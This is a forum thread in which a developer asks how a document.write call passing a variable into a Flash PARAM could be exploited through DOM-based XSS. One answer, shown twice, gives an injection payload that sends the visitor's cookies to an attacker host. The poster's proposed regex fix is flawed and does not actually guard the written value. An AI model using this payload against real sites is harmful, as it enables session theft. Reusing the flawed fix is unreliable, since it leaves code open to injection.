locked
DOM-Based Cross-Site Scripting RRS feed

  • Question

  • User1879451342 posted

    I am not very familiar with DOM-Based Cross-Site Scripting but have been informed that the following lines of code (taken from a .js file) below are leaving my site vulnerable:

    document.write("<PARAM NAME=FlashyVars VALUE='" + strFlashyVars + "'>");

    Does anyone know how this could be manipulated or remedied?

    Thanks,

    cj

    Wednesday, February 12, 2014 6:32 PM

Answers

  • User-760709272 posted

    It depends where strFlashyVars comes from.  If I can change it to

    '/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookies + ';</script><p></p '

    then what gets written to your page is

    <PARAM NAME=FlashyVars VALUE=''/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookies + ';</script><p></p ''>

    and your page is now giving me your cookies, letting me log in as you, or access the site as you, or get some kind of info from you.  Or I could redirect it off to my phishing page or make you go to a site that exploits a vulnerability, or anything really.

    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Wednesday, February 12, 2014 6:48 PM

All replies

  • User-760709272 posted

    It depends where strFlashyVars comes from.  If I can change it to

    '/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookies + ';</script><p></p '

    then what gets written to your page is

    <PARAM NAME=FlashyVars VALUE=''/><script>document.getElementById('someimage').src = 'http://mysite.com/?c=' + document.cookies + ';</script><p></p ''>

    and your page is now giving me your cookies, letting me log in as you, or access the site as you, or get some kind of info from you.  Or I could redirect it off to my phishing page or make you go to a site that exploits a vulnerability, or anything really.

    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Wednesday, February 12, 2014 6:48 PM
  • User1879451342 posted

    That is interesting, thanks.  It is being called from some .html pages.  Sometimes an empty string is being passed int, sometimes values.

    What is the remedy for this type of vulnerability?

    Thursday, February 13, 2014 9:44 AM
  • User1879451342 posted

    This is an informative article :  https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet

    However, I am still not sure how to prevent the attack since the .js file resides on the client.

    Thursday, February 13, 2014 10:02 AM
  • User1879451342 posted

    I think I have found a work-around as this page needs other updating.

    However, something along this line might be helpful to some scenarios:

           var pos = document.URL.indexOf("name=") + 5;
           var name = document.URL.substring(pos, document.URL.length);
           if (name.match(/^[a-zA-Z0-9]$/)) {
               Document.Write(strFlashyVars); 
           }
           else {
               window.alert("Security error");
           }
    

     

     

    Friday, February 14, 2014 8:49 AM
  • User-1949460947 posted

    Although using regexp to restrict the valid values to letters and numbers looks good to me (maybe you could add a length check), taking anything from the URL and rendering it directly into the page gives me a bad feeling. There are so many ways to do XSS: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

    I'm not sure there isn't a way to inject malicious content with only letters and numbers.

    György

    Saturday, February 22, 2014 4:35 AM